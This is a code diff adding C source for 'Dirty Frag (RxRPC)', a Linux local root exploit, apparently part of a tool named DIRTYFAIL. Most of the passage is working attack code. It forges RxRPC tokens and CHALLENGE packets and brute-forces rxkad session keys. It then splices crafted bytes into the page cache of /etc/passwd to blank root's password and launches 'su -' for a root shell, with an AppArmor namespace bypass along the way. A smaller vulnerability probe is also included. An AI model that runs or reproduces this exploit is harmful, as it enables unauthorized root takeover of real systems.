+ return false; + } + write_proc_str("/proc/self/setgroups", "deny"); + char buf[64]; + snprintf(buf, sizeof(buf), "%u %u 1", (unsigned)real_uid, (unsigned)real_uid); + if (!write_proc_str("/proc/self/uid_map", buf)) { + log_bad("uid_map: %s", strerror(errno)); + return false; + } + snprintf(buf, sizeof(buf), "%u %u 1", (unsigned)real_gid, (unsigned)real_gid); + if (!write_proc_str("/proc/self/gid_map", buf)) { + log_bad("gid_map: %s", strerror(errno)); + return false; + } + /* Bring lo up so loopback works inside the new netns. */ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return false; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) { + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + ioctl(s, SIOCSIFFLAGS, &ifr); + } + close(s); + return true; +} + +/* ---- RxRPC v1 token build ------------------------------------------- * + * + * The kernel parses an RxRPC v1 token as a sequence of XDR-encoded + * fields (all big-endian uint32, strings padded to 4-byte boundaries). + * + * flags u32 + * cell_name XDR string + * ntoken u32 + * token[ntoken] = { + * len u32 (length of the rest of the token) + * sec_ix u32 (=2 for RXKAD) + * vice_id u32 + * kvno u32 + * session_key u8[8] ← THE KEY WE BRUTE-FORCED + * issued u32 + * expires u32 + * primary_flag u32 + * ticket_len u32 + * ticket u8[ticket_len] + * } + */ + +static int build_rxrpc_v1_token(uint8_t *out, size_t maxlen, + const uint8_t key[8]) +{ + uint8_t *p = out; + uint8_t *end = out + maxlen; + + /* Helper to bounds-check before each write. */ + #define NEED(n) do { if (p + (n) > end) { errno = E2BIG; return -1; } } while (0) + + uint32_t now = (uint32_t)time(NULL); + uint32_t expires = now + 86400; + + NEED(4); *(uint32_t *)p = htonl(0); p += 4; /* flags */ + + const char *cell = "evil"; + uint32_t clen = (uint32_t)strlen(cell); + uint32_t pad = (4 - (clen & 3)) & 3; + NEED(4 + clen + pad); + *(uint32_t *)p = htonl(clen); p += 4; + memcpy(p, cell, clen); + memset(p + clen, 0, pad); + p += clen + pad; + + NEED(4); *(uint32_t *)p = htonl(1); p += 4; /* ntoken */ + + uint8_t *toklen_slot = p; + NEED(4); p += 4; /* will fill below */ + uint8_t *tokstart = p; + + NEED(4); *(uint32_t *)p = htonl(2); p += 4; /* sec_ix = RXKAD */ + NEED(4); *(uint32_t *)p = htonl(0); p += 4; /* vice_id */ + NEED(4); *(uint32_t *)p = htonl(1); p += 4; /* kvno */ + NEED(8); memcpy(p, key, 8); p += 8; /* session_key */ + NEED(4); *(uint32_t *)p = htonl(now); p += 4; /* issued */ + NEED(4); *(uint32_t *)p = htonl(expires); p += 4; /* expires */ + NEED(4); *(uint32_t *)p = htonl(1); p += 4; /* primary_flag */ + NEED(4); *(uint32_t *)p = htonl(8); p += 4; /* ticket_len */ + NEED(8); memset(p, 0xCC, 8); p += 8; /* ticket (any bytes) */ + + *(uint32_t *)toklen_slot = htonl((uint32_t)(p - tokstart)); + + return (int)(p - out); + #undef NEED +} + +static long add_rxrpc_key(const char *desc, const uint8_t key[8]) +{ + uint8_t buf[256]; + int n = build_rxrpc_v1_token(buf, sizeof(buf), key); + if (n < 0) return -1; + return syscall(SYS_add_key, "rxrpc", desc, buf, (size_t)n, + KEY_SPEC_PROCESS_KEYRING); +} + +/* ---- AF_ALG pcbc(fcrypt) helpers ------------------------------------ * + * + * Used to compute the rxkad packet checksum. The kernel does: + * + * csum_iv = high 8 bytes of PCBC-encrypt({epoch, cid, 0, sec_ix}, + * IV = session_key) + * cksum_h = (PCBC-encrypt({call_id, x}, IV = csum_iv)[1] >> 16) | 1 + * where x = (cid_low2 << 30) | (seq & 0x3fffffff) + * + * We could roll this in user space using fcrypt directly (no AF_ALG), + * but using AF_ALG is simpler and exactly matches what the kernel does + * β€” useful for catching protocol drift across kernel versions. + */ + +static int alg_open_pcbc_fcrypt(const uint8_t key[8]) +{ + int s = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (s < 0) return -1; + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "skcipher", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, "pcbc(fcrypt)", sizeof(sa.salg_name) - 1); + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + close(s); return -1; + } + if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) { + close(s); return -1; + } + return s; +} + +static int alg_pcbc_run(int alg_s, int op, const uint8_t iv[8], + const void *in, size_t inlen, void *out) +{ + int op_fd = accept(alg_s, NULL, NULL); + if (op_fd < 0) return -1; + + char cbuf[CMSG_SPACE(sizeof(int)) + + CMSG_SPACE(sizeof(struct dfr_af_alg_iv))] = {0}; + struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) }; + + struct cmsghdr *c = CMSG_FIRSTHDR(&msg); + c->cmsg_level = SOL_ALG; + c->cmsg_type = ALG_SET_OP; + c->cmsg_len = CMSG_LEN(sizeof(int)); + *(int *)CMSG_DATA(c) = op; + + c = CMSG_NXTHDR(&msg, c); + c->cmsg_level = SOL_ALG; + c->cmsg_type = ALG_SET_IV; + c->cmsg_len = CMSG_LEN(sizeof(struct dfr_af_alg_iv)); + struct dfr_af_alg_iv *aiv = (struct dfr_af_alg_iv *)CMSG_DATA(c); + aiv->ivlen = 8; + memcpy(aiv->iv, iv, 8); + + struct iovec iov = { .iov_base = (void *)in, .iov_len = inlen }; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + + if (sendmsg(op_fd, &msg, 0) < 0) { close(op_fd); return -1; } + ssize_t n = read(op_fd, out, inlen); + close(op_fd); + return n == (ssize_t)inlen ? 0 : -1; +} + +static int compute_csum_iv(uint32_t epoch, uint32_t cid, uint32_t sec_ix, + const uint8_t key[8], uint8_t out[8]) +{ + int s = alg_open_pcbc_fcrypt(key); + if (s < 0) return -1; + uint32_t in[4] = { htonl(epoch), htonl(cid), 0, htonl(sec_ix) }; + uint8_t enc[16]; + int rc = alg_pcbc_run(s, ALG_OP_ENCRYPT, key, in, 16, enc); + close(s); + if (rc < 0) return -1; + memcpy(out, enc + 8, 8); + return 0; +} + +static int compute_cksum(uint32_t cid, uint32_t call_id, uint32_t seq, + const uint8_t key[8], const uint8_t csum_iv[8], + uint16_t *out_h) +{ + int s = alg_open_pcbc_fcrypt(key); + if (s < 0) return -1; + uint32_t x = ((cid & RXRPC_CHANNELMASK) << (32 - RXRPC_CIDSHIFT)) + | (seq & 0x3fffffff); + uint32_t in[2] = { htonl(call_id), htonl(x) }; + uint32_t enc[2]; + int rc = alg_pcbc_run(s, ALG_OP_ENCRYPT, csum_iv, in, 8, enc); + close(s); + if (rc < 0) return -1; + uint16_t v = (uint16_t)((ntohl(enc[1]) >> 16) & 0xffff); + if (v == 0) v = 1; + *out_h = v; + return 0; +} + +/* ---- AF_RXRPC client ------------------------------------------------- */ + +static int setup_rxrpc_client(uint16_t local_port, const char *keyname) +{ + int fd = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); + if (fd < 0) { + log_bad("socket(AF_RXRPC): %s", strerror(errno)); + return -1; + } + + if (setsockopt(fd, SOL_RXRPC, RXRPC_SECURITY_KEY, + keyname, strlen(keyname)) < 0) { + log_bad("setsockopt RXRPC_SECURITY_KEY: %s", strerror(errno)); + close(fd); return -1; + } + + int level = RXRPC_SECURITY_AUTH; + if (setsockopt(fd, SOL_RXRPC, RXRPC_MIN_SECURITY_LEVEL, + &level, sizeof(level)) < 0) { + log_bad("setsockopt RXRPC_MIN_SECURITY_LEVEL: %s", strerror(errno)); + close(fd); return -1; + } + + struct dfr_sockaddr_rxrpc srx; + memset(&srx, 0, sizeof(srx)); + srx.srx_family = AF_RXRPC; + srx.srx_service = 0; + srx.transport_type= SOCK_DGRAM; + srx.transport_len = sizeof(struct sockaddr_in); + srx.transport.sin.sin_family = AF_INET; + srx.transport.sin.sin_port = htons(local_port); + srx.transport.sin.sin_addr.s_addr = htonl(0x7f000001); + if (bind(fd, (struct sockaddr *)&srx, sizeof(srx)) < 0) { + log_bad("bind AF_RXRPC :%u: %s", local_port, strerror(errno)); + close(fd); return -1; + } + return fd; +} + +static int rxrpc_initiate_call(int fd, uint16_t srv_port, + uint16_t svc_id, unsigned long user_call_id) +{ + /* Wire payload β€” fixed 8 bytes, not C-string semantics. */ + char data[8] = { 'P','I','N','G','P','I','N','G' }; + struct dfr_sockaddr_rxrpc srx; + memset(&srx, 0, sizeof(srx)); + srx.srx_family = AF_RXRPC; + srx.srx_service = svc_id; + srx.transport_type= SOCK_DGRAM; + srx.transport_len = sizeof(struct sockaddr_in); + srx.transport.sin.sin_family = AF_INET; + srx.transport.sin.sin_port = htons(srv_port); + srx.transport.sin.sin_addr.s_addr = htonl(0x7f000001); + + char cmsg_buf[CMSG_SPACE(sizeof(unsigned long))]; + struct msghdr msg = { .msg_name = &srx, .msg_namelen = sizeof(srx) }; + struct iovec iov = { .iov_base = data, .iov_len = sizeof(data) }; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + msg.msg_control = cmsg_buf; msg.msg_controllen = sizeof(cmsg_buf); + struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); + cm->cmsg_level = SOL_RXRPC; + cm->cmsg_type = RXRPC_USER_CALL_ID; + cm->cmsg_len = CMSG_LEN(sizeof(unsigned long)); + *(unsigned long *)CMSG_DATA(cm) = user_call_id; + + int fl = fcntl(fd, F_GETFL); + fcntl(fd, F_SETFL, fl | O_NONBLOCK); + ssize_t n = sendmsg(fd, &msg, 0); + fcntl(fd, F_SETFL, fl); + if (n < 0 && errno != EAGAIN && errno != EWOULDBLOCK) return -1; + return 0; +} + +/* ---- UDP fake-server ------------------------------------------------ */ + +static int setup_udp_server(uint16_t port) +{ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return -1; + struct sockaddr_in sa = { + .sin_family = AF_INET, + .sin_port = htons(port), + .sin_addr.s_addr = htonl(0x7f000001), + }; + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + close(s); return -1; + } + return s; +} + +static ssize_t udp_recv_to(int s, void *buf, size_t cap, + struct sockaddr_in *from, int timeout_ms) +{ + struct pollfd pfd = { .fd = s, .events = POLLIN }; + if (poll(&pfd, 1, timeout_ms) <= 0) return -1; + socklen_t fl = from ? sizeof(*from) : 0; + return recvfrom(s, buf, cap, 0, + (struct sockaddr *)from, from ? &fl : NULL); +} + +/* ---- one trigger ---------------------------------------------------- * + * + * Run exactly one 8-byte STORE at file offset `splice_off` of `target_fd`, + * using the rxkad session key `key`. Sequence: + * + * 1. add_key("rxrpc", "evil", v1_token{session_key=key}) + * 2. udp_srv = bind 127.0.0.1:port_S + * 3. rxsk_cli = AF_RXRPC + SECURITY_KEY=evil + bind :port_C + * 4. rxsk_cli sendmsg β†’ triggers handshake β†’ udp_srv receives first packet + * 5. extract (epoch, cid, callN) from that packet + * 6. udp_srv sends forged CHALLENGE β†’ rxsk_cli auto-RESPONSE + * 7. compute csum_iv, cksum with `key` + * 8. build malicious DATA wire header + * 9. pipe(); vmsplice(hdr); splice(target@splice_off, 8B); splice(pipe β†’ udp_srv) + * 10. recvmsg(rxsk_cli) drives kernel through verify_packet β†’ in-place STORE + */ + +static int g_trigger_seq = 0; + +static bool do_one_trigger(int target_fd, off_t splice_off, + const uint8_t key[8]) +{ + char keyname[32]; + snprintf(keyname, sizeof(keyname), "df-evil%d", g_trigger_seq++); + + long key_id = add_rxrpc_key(keyname, key); + if (key_id < 0) { + log_bad("add_rxrpc_key: %s", strerror(errno)); + return false; + } + + /* Use varying ports so kernel TIME_WAIT / stale state doesn't bite. */ + uint16_t port_S = (uint16_t)(7777 + (g_trigger_seq * 2 % 200)); + uint16_t port_C = (uint16_t)(port_S + 1); + uint16_t svc_id = 1234; + + int udp_srv = setup_udp_server(port_S); + if (udp_srv < 0) { log_bad("udp server"); return false; } + + int rxsk = setup_rxrpc_client(port_C, keyname); + if (rxsk < 0) { log_bad("rxrpc client"); close(udp_srv); return false; } + + if (rxrpc_initiate_call(rxsk, port_S, svc_id, 0xDEAD) < 0) { + log_bad("initiate call"); + close(rxsk); close(udp_srv); return false; + } + + /* Receive first packet from rxsk_cli β€” this is the kernel's + * implicit DATA-0 (handshake init). It carries epoch + cid. */ + uint8_t pkt[2048]; + struct sockaddr_in cli_addr; + ssize_t n = udp_recv_to(udp_srv, pkt, sizeof(pkt), &cli_addr, 1500); + if (n < (ssize_t)sizeof(struct rxrpc_wire_hdr)) { + log_bad("no handshake packet (n=%zd)", n); + close(rxsk); close(udp_srv); return false; + } + struct rxrpc_wire_hdr *whdr = (struct rxrpc_wire_hdr *)pkt; + uint32_t epoch = ntohl(whdr->epoch); + uint32_t cid = ntohl(whdr->cid); + uint32_t callN = ntohl(whdr->callNumber); + uint16_t svc_in = ntohs(whdr->serviceId); + uint16_t cliport= ntohs(cli_addr.sin_port); + + /* Send forged CHALLENGE so the client emits RESPONSE and primes + * conn->rxkad.cipher with our session key. */ + { + struct { + struct rxrpc_wire_hdr hdr; + struct rxkad_challenge_payload ch; + } __attribute__((packed)) c; + memset(&c, 0, sizeof(c)); + c.hdr.epoch = htonl(epoch); + c.hdr.cid = htonl(cid); + c.hdr.serial = htonl(0x10000); + c.hdr.type = RXRPC_PKT_CHALLENGE; + c.hdr.securityIndex = 2; + c.hdr.serviceId = htons(svc_in); + c.ch.version = htonl(2); + c.ch.nonce = htonl(0xdeadbeefu); + c.ch.min_level = htonl(1); + + struct sockaddr_in to = { + .sin_family = AF_INET, + .sin_port = htons(cliport), + .sin_addr.s_addr = htonl(0x7f000001), + }; + if (sendto(udp_srv, &c, sizeof(c), 0, + (struct sockaddr *)&to, sizeof(to)) < 0) { + log_bad("send CHALLENGE: %s", strerror(errno)); + close(rxsk); close(udp_srv); return false; + } + } + + /* Drain whatever RESPONSE / further packets the client emits. */ + for (int i = 0; i < 4; i++) { + struct sockaddr_in src; + if (udp_recv_to(udp_srv, pkt, sizeof(pkt), &src, 500) < 0) break; + } + + /* Compute csum_iv + wire cksum with our session key. */ + uint8_t csum_iv[8]; + if (compute_csum_iv(epoch, cid, 2, key, csum_iv) < 0) { + log_bad("compute_csum_iv"); + close(rxsk); close(udp_srv); return false; + } + uint16_t cksum_h = 0; + if (compute_cksum(cid, callN, 1, key, csum_iv, &cksum_h) < 0) { + log_bad("compute_cksum"); + close(rxsk); close(udp_srv); return false; + } + + /* Build malicious DATA wire header. */ + struct rxrpc_wire_hdr mal; + memset(&mal, 0, sizeof(mal)); + mal.epoch = htonl(epoch); + mal.cid = htonl(cid); + mal.callNumber = htonl(callN); + mal.seq = htonl(1); + mal.serial = htonl(0x42000); + mal.type = RXRPC_PKT_DATA; + mal.flags = RXRPC_LAST_PACKET; + mal.securityIndex = 2; + mal.cksum = htons(cksum_h); + mal.serviceId = htons(svc_in); + + /* connect udp_srv β†’ client port so we can splice. */ + struct sockaddr_in dst = { + .sin_family = AF_INET, + .sin_port = htons(cliport), + .sin_addr.s_addr = htonl(0x7f000001), + }; + if (connect(udp_srv, (struct sockaddr *)&dst, sizeof(dst)) < 0) { + log_bad("connect udp_srv: %s", strerror(errno)); + close(rxsk); close(udp_srv); return false; + } + + /* The actual splice trigger: pipe < hdr ; pipe < file@off,8 ; udp < pipe */ + int p[2]; + if (pipe(p) < 0) { close(rxsk); close(udp_srv); return false; } + { + struct iovec v = { .iov_base = &mal, .iov_len = sizeof(mal) }; + if (vmsplice(p[1], &v, 1, 0) != (ssize_t)sizeof(mal)) { + log_bad("vmsplice: %s", strerror(errno)); + close(p[0]); close(p[1]); + close(rxsk); close(udp_srv); return false; + } + } + { + loff_t off = splice_off; + if (splice(target_fd, &off, p[1], NULL, 8, 0) != 8) { + log_bad("splice file->pipe: %s", strerror(errno)); + close(p[0]); close(p[1]); + close(rxsk); close(udp_srv); return false; + } + } + if (splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + 8, 0) + != (ssize_t)(sizeof(mal) + 8)) { + log_bad("splice pipe->udp: %s", strerror(errno)); + close(p[0]); close(p[1]); + close(rxsk); close(udp_srv); return false; + } + close(p[0]); close(p[1]); + + /* recvmsg drives the kernel through verify_packet and fires the + * in-place STORE. We don't care about the actual data. */ + int fl = fcntl(rxsk, F_GETFL); + fcntl(rxsk, F_SETFL, fl | O_NONBLOCK); + char rb[2048]; + struct dfr_sockaddr_rxrpc rsrx; + char ccb[256]; + for (int round = 0; round < 5; round++) { + struct msghdr m = { .msg_name = &rsrx, .msg_namelen = sizeof(rsrx) }; + struct iovec iv = { .iov_base = rb, .iov_len = sizeof(rb) }; + m.msg_iov = &iv; m.msg_iovlen = 1; + m.msg_control = ccb; m.msg_controllen = sizeof(ccb); + ssize_t r = recvmsg(rxsk, &m, 0); + if (r > 0) break; + if (errno == EAGAIN || errno == EWOULDBLOCK) usleep(20000); + else break; + } + fcntl(rxsk, F_SETFL, fl); + + close(rxsk); + close(udp_srv); + return true; +} + +/* ---- predicates ----------------------------------------------------- */ + +static bool predicate_pa_nullok(const uint8_t P[8]) +{ + /* Want chars 4..5 of /etc/passwd to become "::" β€” empty pwd field. */ + return P[0] == ':' && P[1] == ':'; +} + +static bool predicate_pb_nullok(const uint8_t P[8]) +{ + /* Want chars 6..7 = "0:" (uid=0 with separator). */ + return P[0] == '0' && P[1] == ':'; +} + +static bool predicate_pc_nullok(const uint8_t P[8]) +{ + /* Want chars 8..15 = "0:GGGGG:". G βˆ‰ {':' '\0' '\n'}. */ + if (P[0] != '0' || P[1] != ':' || P[7] != ':') return false; + for (int i = 2; i < 7; i++) + if (P[i] == ':' || P[i] == '\0' || P[i] == '\n') return false; + return true; +} + +/* ---- main exploit --------------------------------------------------- */ + +#define MAX_BRUTE_ITERS_AB (1ULL << 24) /* ~3 ms expected hit, headroom */ +#define MAX_BRUTE_ITERS_C (1ULL << 30) /* ~1 s expected hit, more headroom */ + +df_result_t dirtyfrag_rxrpc_exploit(bool do_shell) +{ + log_step("Dirty Frag (RxRPC) β€” exploit"); + + if (real_uid_for_target() == 0) { + log_warn("already root in init namespace β€” nothing to escalate"); + return DF_OK; + } + + /* Initialize fcrypt and verify the cipher works. */ + fcrypt_init(); + if (!fcrypt_selftest()) { + log_bad("fcrypt selftest FAILED β€” wrong S-boxes or key schedule"); + return DF_TEST_ERROR; + } + log_ok("fcrypt selftest OK"); + + /* The RxRPC variant targets line 1 of /etc/passwd unconditionally + * (it makes root's password empty for PAM nullok). We need the + * 16 bytes at offsets 4..15 of that file to do the brute force. */ + int pfd = open("/etc/passwd", O_RDONLY); + if (pfd < 0) { log_bad("open /etc/passwd: %s", strerror(errno)); return DF_TEST_ERROR; } + + /* Read the page and the original ciphertexts at offsets 4, 6, 8. */ + uint8_t Cline[16]; + if (pread(pfd, Cline, 16, 0) != 16) { + log_bad("pread /etc/passwd: %s", strerror(errno)); + close(pfd); return DF_TEST_ERROR; + } + log_step("/etc/passwd[0..15] = '%.16s'", (char *)Cline); + + uint8_t Ca[8], Cb[8], Cc[8]; + memcpy(Ca, Cline + 4, 8); + memcpy(Cb, Cline + 6, 8); + memcpy(Cc, Cline + 8, 8); + + log_warn("about to:"); + log_warn(" 1. brute-force three rxkad session keys (~1 second total)"); + log_warn(" 2. enter a fresh user/net namespace"); + log_warn(" 3. fire 3 splice triggers against /etc/passwd page cache"); + log_warn(" 4. PAM `pam_unix nullok` will accept empty password for root"); + log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`"); + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined β€” aborting"); + close(pfd); return DF_OK; + } + + /* === Brute force K_A ============================================= */ + uint8_t Ka[8], Pa[8]; + if (!fcrypt_brute_force(Ca, predicate_pa_nullok, MAX_BRUTE_ITERS_AB, + (uint64_t)time(NULL) ^ 0xA1ULL, + "K_A (chars 4..5 = \"::\")", Ka, Pa)) { + log_bad("K_A brute force exhausted"); + close(pfd); return DF_EXPLOIT_FAIL; + } + + /* === Chained-ciphertext correction for K_B ====================== * + * + * After splice A overwrites bytes 4..11 with P_A, splice B at offset 6 + * (length 8) sees: bytes 6..11 = P_A[2..7], bytes 12..13 = original. + */ + uint8_t Cb_actual[8]; + memcpy(Cb_actual, Pa + 2, 6); + memcpy(Cb_actual + 6, Cb + 6, 2); + + /* === Brute force K_B ============================================= */ + uint8_t Kb[8], Pb[8]; + if (!fcrypt_brute_force(Cb_actual, predicate_pb_nullok, MAX_BRUTE_ITERS_AB, + (uint64_t)time(NULL) ^ 0xB2ULL, + "K_B (chars 6..7 = \"0:\")", Kb, Pb)) { + log_bad("K_B brute force exhausted"); + close(pfd); return DF_EXPLOIT_FAIL; + } + + /* === Chained-ciphertext correction for K_C ====================== */ + uint8_t Cc_actual[8]; + memcpy(Cc_actual, Pb + 2, 6); + memcpy(Cc_actual + 6, Cc + 6, 2); + + /* === Brute force K_C ============================================= */ + uint8_t Kc[8], Pc[8]; + if (!fcrypt_brute_force(Cc_actual, predicate_pc_nullok, MAX_BRUTE_ITERS_C, + (uint64_t)time(NULL) ^ 0xC3ULL, + "K_C (chars 8..15 = \"0:GGGGG:\")", Kc, Pc)) { + log_bad("K_C brute force exhausted"); + close(pfd); return DF_EXPLOIT_FAIL; + } + close(pfd); + + log_ok("all three keys found; handing off to bypass child for triggers"); + + /* Pass the three K's to the inner via hex-encoded env vars. The + * inner runs in the AA bypass userns (where add_key + AF_RXRPC + * have CAP_NET_ADMIN); we (parent, init ns) stay here so the + * eventual `su -` reaches REAL init-ns root via PAM nullok. */ + char hex[8 * 2 + 1]; + #define HEXSET(name, k) do { \ + for (int i = 0; i < 8; i++) snprintf(hex + i*2, 3, "%02x", k[i]); \ + setenv(name, hex, 1); \ + } while (0) + HEXSET("DIRTYFAIL_K_A", Ka); + HEXSET("DIRTYFAIL_K_B", Kb); + HEXSET("DIRTYFAIL_K_C", Kc); + #undef HEXSET + setenv("DIRTYFAIL_INNER_MODE", "rxrpc", 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner exploit failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + /* Verify in init namespace β€” page cache is global. */ + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + uint8_t after[16]; + ssize_t got = read(v, after, 16); + close(v); + if (got != 16) return DF_EXPLOIT_FAIL; + + log_step("/etc/passwd[0..15] now = '%.16s'", (char *)after); + + if (after[4] != ':' || after[5] != ':') { + log_bad("page cache not in expected shape; trigger may have missed"); + return DF_EXPLOIT_FAIL; + } + log_ok("/etc/passwd page cache: root password field is now empty"); + + if (!do_shell) { + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted (--no-shell)"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su -' in init ns β€” PAM nullok accepts empty password β†’ REAL ROOT"); + execlp("su", "su", "-", (char *)NULL); + log_bad("execlp su: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* ---- inner --------------------------------------------------------- + * + * Runs in the AA bypass userns. Reads the three K's from + * DIRTYFAIL_K_{A,B,C} env vars, fires three do_one_trigger calls. + * The fcrypt brute force itself ran in the parent (no caps required). + */ + +static bool hex_to_8b(const char *hex, uint8_t out[8]) +{ + if (!hex || strlen(hex) != 16) return false; + for (int i = 0; i < 8; i++) { + unsigned int b; + if (sscanf(hex + i*2, "%2x", &b) != 1) return false; + out[i] = (uint8_t)b; + } + return true; +} + +df_result_t dirtyfrag_rxrpc_exploit_inner(void) +{ + uint8_t Ka[8], Kb[8], Kc[8]; + if (!hex_to_8b(getenv("DIRTYFAIL_K_A"), Ka) || + !hex_to_8b(getenv("DIRTYFAIL_K_B"), Kb) || + !hex_to_8b(getenv("DIRTYFAIL_K_C"), Kc)) { + log_bad("inner: DIRTYFAIL_K_{A,B,C} not set or invalid"); + return DF_TEST_ERROR; + } + + /* Autoload rxrpc.ko by opening a dummy AF_RXRPC socket. */ + int dummy = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); + if (dummy >= 0) close(dummy); + + int t = open("/etc/passwd", O_RDONLY); + if (t < 0) { + log_bad("inner: open passwd: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; + } + + bool ok = do_one_trigger(t, 4, Ka) + && do_one_trigger(t, 6, Kb) + && do_one_trigger(t, 8, Kc); + close(t); + return ok ? DF_EXPLOIT_OK : DF_EXPLOIT_FAIL; +} + +/* ---------------------------------------------------------------- * + * Active probe β€” `--scan --active` path. + * + * Fires ONE forged-handshake trigger against a /tmp sentinel page + * with an arbitrary 8-byte key. We don't try to predict what lands; + * any byte change inside the spliced 8-byte window confirms the + * kernel ran the STORE. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_rxrpc_active_probe_inner(void) +{ + const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); + if (!sentinel || !*sentinel) { + log_bad("rxrpc-probe: DIRTYFAIL_PROBE_SENTINEL not set"); + return DF_TEST_ERROR; + } + + int dummy = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); + if (dummy >= 0) close(dummy); + + int t = open(sentinel, O_RDONLY); + if (t < 0) { + log_bad("rxrpc-probe: open %s: %s", sentinel, strerror(errno)); + return DF_TEST_ERROR; + } + + /* Any 8-byte key works for a structural probe β€” we're not + * recovering plaintext, just confirming the STORE fires. */ + static const uint8_t probe_key[8] = { + 0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x23, 0x45, 0x67 + }; + bool ok = do_one_trigger(t, 0, probe_key); + close(t); + return ok ? DF_EXPLOIT_OK : DF_TEST_ERROR; +} + +df_result_t dirtyfrag_rxrpc_active_probe(void) +{ + char tmpl[] = "/tmp/dirtyfail-rxrpc-probe.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("rxrpc-probe mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(sfd); + + /* Fault page in. */ + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(rfd); + + setenv("DIRTYFAIL_INNER_MODE", "rxrpc-probe", 1); + setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); + int rc = apparmor_bypass_fork_arm(0, NULL); + unsetenv("DIRTYFAIL_INNER_MODE"); + unsetenv("DIRTYFAIL_PROBE_SENTINEL"); + + if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } + if (rc != DF_EXPLOIT_OK) { + log_bad("rxrpc-probe inner failed (exit=%d)", rc); + unlink(tmpl); return DF_TEST_ERROR; + } + + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[64]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return DF_TEST_ERROR; + + /* Look for any byte that differs from the 'A' filler in the first + * 32 bytes (the spliced 8-byte window plus any nearby fallout). */ + int first_diff = -1; + for (int i = 0; i < (int)got && i < 32; i++) { + if (after[i] != 'A') { first_diff = i; break; } + } + if (first_diff >= 0) { + log_warn("ACTIVE PROBE rxrpc: STORE landed near offset %d β†’ kernel is VULNERABLE", + first_diff); + return DF_VULNERABLE; + } + log_ok("ACTIVE PROBE rxrpc: page intact β€” kernel rxrpc path appears patched"); + return DF_OK; +} + +#else /* not __linux__ */ +df_result_t dirtyfrag_rxrpc_exploit(bool do_shell) +{ + (void)do_shell; + log_bad("dirtyfrag_rxrpc_exploit: Linux-only"); + return DF_TEST_ERROR; +} +df_result_t dirtyfrag_rxrpc_exploit_inner(void) +{ + log_bad("dirtyfrag_rxrpc_exploit_inner: Linux-only"); + return DF_TEST_ERROR; +} +df_result_t dirtyfrag_rxrpc_active_probe(void) +{ + log_bad("dirtyfrag_rxrpc_active_probe: Linux-only"); + return DF_TEST_ERROR; +} +df_result_t dirtyfrag_rxrpc_active_probe_inner(void) +{ + log_bad("dirtyfrag_rxrpc_active_probe_inner: Linux-only"); + return DF_TEST_ERROR; +} +#endif diff --git a/modules/copy_fail_family/dirtyfrag_rxrpc.h b/modules/copy_fail_family/dirtyfrag_rxrpc.h new file mode 100644 index 0000000..830a122 --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_rxrpc.h @@ -0,0 +1,34 @@ +/* + * DIRTYFAIL β€” dirtyfrag_rxrpc.h + * + * RxRPC variant of Dirty Frag (CVE-2026-43500). + */ + +#ifndef DIRTYFAIL_DIRTYFRAG_RXRPC_H +#define DIRTYFAIL_DIRTYFRAG_RXRPC_H + +#include "common.h" + +/* Precondition probe: kernel + rxrpc.ko + AF_RXRPC openable. */ +df_result_t dirtyfrag_rxrpc_detect(void); + +/* Real PoC: brute-force three rxkad session keys K_A, K_B, K_C such + * that pcbc(fcrypt)-decrypting /etc/passwd line 1 at offsets 4/6/8 + * with last-write-wins produces "root::0:0:GGGGGG:/root:/bin/bash". + * Then enter a fresh user/net namespace, run the three forged-handshake + * splice triggers, and (if do_shell) execve `su -` to drop a root shell + * via PAM `pam_unix 